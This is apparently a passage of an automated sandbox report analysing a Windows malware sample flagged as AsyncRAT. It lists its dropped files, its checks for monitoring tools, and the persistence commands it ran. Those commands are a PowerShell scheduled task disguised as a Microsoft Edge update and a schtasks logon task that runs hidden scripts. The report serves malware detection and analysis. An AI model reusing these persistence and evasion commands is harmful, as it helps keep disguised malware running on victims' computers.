Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Code function: 0_3_00FF1A41 push eax; ret	0_3_00FF1A42
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Code function: 0_3_00FF1A41 push eax; ret	0_3_00FF1A42
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Code function: 0_3_00FF1A41 push eax; ret	0_3_00FF1A42
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Code function: 0_3_00FF1A41 push eax; ret	0_3_00FF1A42
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Code function: 0_3_00FF1A41 push eax; ret	0_3_00FF1A42
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Code function: 0_3_00FF1A41 push eax; ret	0_3_00FF1A42
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Code function: 0_3_00FF1A41 push eax; ret	0_3_00FF1A42
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Code function: 0_3_00FF1A41 push eax; ret	0_3_00FF1A42
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Code function: 0_3_00FF1A41 push eax; ret	0_3_00FF1A42
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Code function: 0_3_00FF1A41 push eax; ret	0_3_00FF1A42
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Code function: 0_3_00FF1A41 push eax; ret	0_3_00FF1A42
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Code function: 0_3_00FF1A41 push eax; ret	0_3_00FF1A42
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Code function: 0_3_00FF1A41 push eax; ret	0_3_00FF1A42
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Code function: 0_3_00FF1A41 push eax; ret	0_3_00FF1A42
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Code function: 0_3_00FF1A41 push eax; ret	0_3_00FF1A42
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Code function: 0_3_00FF1A41 push eax; ret	0_3_00FF1A42
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Code function: 0_3_00FF1A41 push eax; ret	0_3_00FF1A42
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Code function: 0_3_00FF1A41 push eax; ret	0_3_00FF1A42

Source: SQ1NgqeTQy.exe	Static PE information: section name: entropy: 7.977031278623509
Source: SQ1NgqeTQy.exe	Static PE information: section name: payugmud entropy: 7.953418950788416
Source: VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe.0.dr	Static PE information: section name: dxkyhxuw entropy: 7.95457879562859
Source: 78K21CNZITPIMAK88B8Q.exe.0.dr	Static PE information: section name: entropy: 7.979953974782096
Source: skotes.exe.4.dr	Static PE information: section name: entropy: 7.979953974782096
Source: random[1].exe0.8.dr	Static PE information: section name: entropy: 7.976929850931208
Source: random[1].exe0.8.dr	Static PE information: section name: jxlmjtji entropy: 7.953783368763905
Source: f35b37b5a5.exe.8.dr	Static PE information: section name: entropy: 7.976929850931208
Source: f35b37b5a5.exe.8.dr	Static PE information: section name: jxlmjtji entropy: 7.953783368763905

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	File created: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\is-G2DME.tmp\21a4f8ff7d.tmp	File created: C:\Users\user\AppData\Roaming\is-KKQ75.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File created: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HTIMB.tmp\21a4f8ff7d.tmp	File created: C:\Users\user\AppData\Local\Temp\is-HRDDT.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1062163001\21a4f8ff7d.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1062163001\21a4f8ff7d.exe	File created: C:\Users\user\AppData\Local\Temp\is-G2DME.tmp\21a4f8ff7d.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Jump to dropped file
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	File created: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1062163001\21a4f8ff7d.exe	File created: C:\Users\user\AppData\Local\Temp\is-HTIMB.tmp\21a4f8ff7d.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-G2DME.tmp\21a4f8ff7d.tmp	File created: C:\Users\user\AppData\Local\unins000.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HTIMB.tmp\21a4f8ff7d.tmp	File created: C:\Users\user\AppData\Local\Temp\is-HRDDT.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-G2DME.tmp\21a4f8ff7d.tmp	File created: C:\Users\user\AppData\Roaming\uxtheme_2.drv (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-G2DME.tmp\21a4f8ff7d.tmp	File created: C:\Users\user\AppData\Local\Temp\is-II4D5.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1062164001\94cd0458cc.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HTIMB.tmp\21a4f8ff7d.tmp	File created: C:\Users\user\AppData\Local\Temp\is-HRDDT.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-G2DME.tmp\21a4f8ff7d.tmp	File created: C:\Users\user\AppData\Local\is-SSA0P.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	File created: C:\ProgramData\5xtr1\jw4wb1	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1062161001\ca3f738a4c.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-G2DME.tmp\21a4f8ff7d.tmp	File created: C:\Users\user\AppData\Local\Temp\is-II4D5.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1062165001\52d42007e3.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-G2DME.tmp\21a4f8ff7d.tmp	File created: C:\Users\user\AppData\Local\Temp\is-II4D5.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe	Jump to dropped file
Source: C:\Windows\System32\regsvr32.exe	File created: C:\Users\user\AppData\Local\dllhost.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	File created: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com

File created: C:\ProgramData\5xtr1\jw4wb1

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com

File created: C:\ProgramData\5xtr1\jw4wb1

Jump to dropped file

Boot Survival

Yara detected AsyncRAT

Source: Yara match	File source: 29.2.regsvr32.exe.8a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.3.Macromedia.com.4055ad0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 52.2.MSBuild.exe.bc0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.3.Macromedia.com.4055ad0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.regsvr32.exe.8a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.3.Macromedia.com.406c2e0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.regsvr32.exe.20e131e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.regsvr32.exe.66ca5e.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.3.Macromedia.com.4055ad0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.3.Macromedia.com.4055ad0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.regsvr32.exe.66ca5e.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.regsvr32.exe.20e131e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000002C.00000003.3252145471.0000000004061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.3319737101.0000000001837000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.3319485520.0000000004056000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.3250710054.0000000003FDB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.4573572672.00000000008A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.3322775695.000000000182E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.3319485520.000000000407E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.3319485520.000000000406E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.3255556898.0000000004055000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000034.00000002.4566675637.0000000000BC2000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.4575261917.00000000020E0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.3319803924.0000000001824000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.4569892251.000000000064B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.3250710054.000000000404A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Macromedia.com PID: 1124, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 4724, type: MEMORYSTR

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe	Window searched: window name: PROCMON_WINDOW_CLASS

Uses Register-ScheduledTask to add task schedules

Source: C:\Windows\System32\regsvr32.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{934473F6-3DB5-419B-8D3A-27C77AD9ADC5}' -Description 'MicrosoftEdgeUpdateTaskMachineUA' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0) -RunLevel Highest"

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "AchillesGuard" /tr "wscript //B 'C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js'" /sc onlogon /F /RL HIGHEST

Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\1455911B45668B5C82FC 5C34AEE5196E0F8615B8D1D9017DD710EA28D2B7AC99295D46046D12EEA58D78

Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062161001\ca3f738a4c.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062161001\ca3f738a4c.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062161001\ca3f738a4c.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062161001\ca3f738a4c.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062161001\ca3f738a4c.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062161001\ca3f738a4c.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062161001\ca3f738a4c.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062161001\ca3f738a4c.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062161001\ca3f738a4c.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062161001\ca3f738a4c.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062161001\ca3f738a4c.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062161001\ca3f738a4c.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062163001\21a4f8ff7d.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-HTIMB.tmp\21a4f8ff7d.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-HTIMB.tmp\21a4f8ff7d.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-HTIMB.tmp\21a4f8ff7d.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-HTIMB.tmp\21a4f8ff7d.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-HTIMB.tmp\21a4f8ff7d.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-HTIMB.tmp\21a4f8ff7d.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-HTIMB.tmp\21a4f8ff7d.tmp	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062163001\21a4f8ff7d.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-G2DME.tmp\21a4f8ff7d.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-G2DME.tmp\21a4f8ff7d.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-G2DME.tmp\21a4f8ff7d.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-G2DME.tmp\21a4f8ff7d.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-G2DME.tmp\21a4f8ff7d.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-G2DME.tmp\21a4f8ff7d.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-G2DME.tmp\21a4f8ff7d.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-G2DME.tmp\21a4f8ff7d.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX
